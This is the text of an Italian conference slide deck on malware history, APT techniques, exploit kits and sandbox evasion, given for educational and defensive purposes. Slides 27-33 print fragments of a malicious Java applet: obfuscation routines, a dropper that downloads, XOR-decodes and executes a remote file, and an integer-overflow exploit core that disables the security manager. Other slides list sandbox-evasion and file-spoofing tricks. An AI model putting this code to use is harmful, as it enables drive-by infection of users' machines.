  • 4. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <1996> The Dark Side of the Moon http://vx.org.ua/29a/main.html
  • 5. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines <2000> 8,7 miliardi di dollari
  • 6. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2001> The Nimda Style Microsoft IIS e PWS Extended Unicode Directory transversalVulnerability Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability Microsoft IE MIME Header Attachment Execution VulnerabilityTFTP Server UDP:69 RICHED20.DLL Microsoft Office 2000 DLL Execution Vulnerability Microsoft IE MIME Header Attachment Execution Vulnerability 635 milioni di dollari
  • 7. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com SQL Server 2000 Desktop Engine 75.000 computer infettati in soli 10 minuti payload di soli 376 byte (residente esclusivamente in memoria) 1,2 miliardi di dollari
  • 8. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com 22,6 miliardi di dollari DDOS contro www.sco.com Upload&Execute0x85 0x13 0x3c 0x9e 0xa2 Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html
  • 9. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2010-2012> Government in Action > Stuxnet (2010) > Duqu (2011) > Flame (2012) > Gauss (2012) http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/ ShoppingFor Zero-Days
  • 10. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il Malware più complesso della storia > 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati) > 80 domini utilizzati come sistemi di Comando e Controllo > Diffusione via USB Stick (Infectmedia) > Enumerazione dei dispositivi Bluetooth (Beetlejuice) > Registrazione audio (Microbe) > Windows Update MITM (Munch & Gadget) MD5 Collision Attack
  • 11. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2007> Storm Worm & CyberCrime Market http://www.pcworld.com/article/138694/article.html
  • 12. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/ « »
  • 13. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Advanced Persistent Threats 101 > Trust Exploitation Social Engineering Spear Phishing Botnet Drive-to-Click Strategy
  • 14. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation Exploit Pack (e.g.Neutrino) 0-Day Advanced Persistent Threats 101
  • 15. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage Shellcoding Dropper/Downloader Modules(e.g.RAT, Infostealer,etc.) Good Covert Channel Advanced Persistent Threats 101
  • 16. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector Email WebSites Botnet Physical (USB) Advanced Persistent Threats 101
  • 17. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector > Resiliency Camouflaging Command &Control Good Covert Channel Advanced Persistent Threats 101
  • 18. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Make or Buy?
  • 19. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Botnet Choice
  • 20. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#1>
  • 21. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#2>
  • 22. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#3>
  • 23. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#4>
  • 24. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#5>
  • 25. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#1> Giochiamo con le estensioni RLO Unicode control character
  • 26. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#2> Content-Disposition Nightmare http://www.gnucitizen.org/blog/content-disposition-hacking/ Download Server Response Headers RFC 2616
  • 27. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <applet codebase=“http://blahblah.evilsite.in/hiddenpath/" archive=“http://blahblah.othersite.in/hiddenpath/ c8c34734f41cca863a972129369060d9” code=“rgmiv”> Trick#3> Client Exploiting
  • 28. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com public class xp extends JApplet { public void init() { try { Object aobj[] = new Object[0]; Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1); String s = "hpjwbludyi"; s = "wgpxrwyvzolbb"; s = "zdfmvftloqmakqysyu"; s = "nrrkqnjfylgtljyyferr"; cr.hzumfnc(obj); Object aobj1[] = new Object[0]; String s1 = "ofvszonrzgelnko"; s1 = "fefhtspcqhj"; s1 = "evztavmzjarjgwu"; Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] { Integer.TYPE }).newInstance(new Object[] { Integer.valueOf(tcbteokd.mdrikbua(9)) }); int ai[] = new int[8]; Object aobj2[] = new Object[7]; aobj2[2] = cr.hzumfnc(obj); ...
  • 29. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> XOR String Encryption public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7"); ... public static String n(String s) { String s1 = ""; for (int i = 0; i < s.length(); i++) s1 += idzfihff(s.charAt(i)); return s1; } ... public static char idzfihff(char c) { return (char)(c ^ 0x5b); } https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
  • 30. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <02> Java Reflection public static Class fuss(String s) throws Exception { return Class.forName(s); } ... public static Object dngfuv(Method method, Object obj, Object aobj[]) { return method.invoke(obj, aobj); } public static Constructor bjixqh(Class class1, Class aclass[]) { return class1.getConstructor(aclass); } ... https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
  • 31. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <03> ClassLoader Override class t extends ClassLoader { public static void ujrzjw(t t1, String s) { try { Class class1 = t1.defineClass("qbw", tcbteokd.xcpoalaefqfvuacylvakyi, 0, tcbteokd.xcpoalaefqfvuacylvakyi.length); ygigtele.bjixqh(class1, new Class[] { tcbteokd.fuss("java.lang.String") }).newInstance(new Object[] { s }); } catch (Exception ex) { System.exit(0); } } } Malware
  • 32. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com ... private static void lcsqyrgtbct (String s, int i) { String s1 = s + Integer.valueOf(i); ... rchannel= Channels.newChannel((new URL(s1)).openStream()); ... File file = File.createTempFile("~tmf", null); FileOutputStream fos= new FileOutputStream(file); for (int j = 0; j < abyte0.length; j++) abyte0[j] = (byte)(abyte0[j] ^ 0x29); fos.write(abyte0); if (abyte0.length > 1024) try { Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", file.getAbsolutePath() }); } catch (IOException ioe) { (new ProcessBuilder(new String[] { file.getAbsolutePath() })).start(); } The Dropper Class
  • 33. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Object obj1 = new java.awt.image.DataBufferByte(9); int[] ai = new int[8]; Object[] oo = new Object[7]; oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]); ... DataBufferByte obj5 = new DataBufferByte(8); for (int j = 0; j < 8; j++) obj5.setElem(j, -1); MultiPixelPackedSampleModel obj6 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0); Raster obj7 = Raster.createWritableRaster(obj6, obj5, null); MultiPixelPackedSampleModel obj8 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1, 0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0)); Raster obj9 = Raster.createWritableRaster(obj8, obj1, null); byte obj10 = new byte[] {0, -1} IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10); CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null); obj12.compose(obj7, obj9, obj9); The Malware Core http://valhalla.allalla.com/2013/08/ java-netbeans-applet-integer-overflow-win32-target-added/
  • 34. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Cheaper Path to Exploiting Blackole Exploit Kit http://en.wikipedia.org/wiki/Blackhole_exploit_kit Styx Exploit Pack http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto Neutrino http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more- exploit-kit.html RedKit http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
  • 35. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The InfoStealer Choice
  • 36. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The RAT Choice
  • 37. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Bitcoin + APT = Ransomware
  • 38. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#1>
  • 39. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#2>
  • 40. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#3>
  • 41. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#4>
  • 42. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose” MikkoHypponen(F-Secure) <2012> The Antivirus Maker Confession
  • 43. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Way to Sandboxing
  • 44. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> USER-MODE AGENT Softwarecomponent inaguest operating system (keylogger) <02> KERNEL-MODE PATCHING Guestoperating system Kernelmodified fortracing (rootkit) <03> VIRTUAL MACHINE MONITORING Customized Hypervisor to monitor the guest operatingsystem <04> SYSTEM EMULATION Hardwareemulator to hookappropriate memory, IO functions,peripherals, etc. <05> KERNEL EMULATION Kernelemulator tohookappropriate system calls, etc. The Way to Sandboxing
  • 45. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (molto) parziale dei Player > Norman Sandbox (Norway2001) > FireEye (US2004) > Damballa (US2006) > Lastline/Anubis/Wepawet (Austria 2006) > Sandboxie (2006) > Cuckoo Sandbox (2010) > VMRay formerly CWSandbox (Germany 2007) > Joe Security LLC (Switzerland 2007) > BitBlaze (2008) > ThreatExpert (Ireland 2008) > Ether (US 2009)
  • 46. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com
  • 47. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (completamente) parziale degli Evader
  • 48. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012) > MessageBox (Something thatneed to be clicked) > Sleep Calls (Trojan Nap, uncoveredin February2013) > Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea) > Check Internet Connection > Check Volume information and Size > Check self Executable name > Execution after reboot > Check System services, files and communication ports
  • 49. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il limite delle Sandbox Minuti def: il Paziente Zero è il primo paziente individuato nel campione della popolazione di un'indagine epidemiologica…
  • 50. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Sicuramente meglio che confidare negli utenti
  • 51. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Domande? Italian ‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬ Arabic ¿Preguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Ερωτήσεις? Greek вопросы? Russian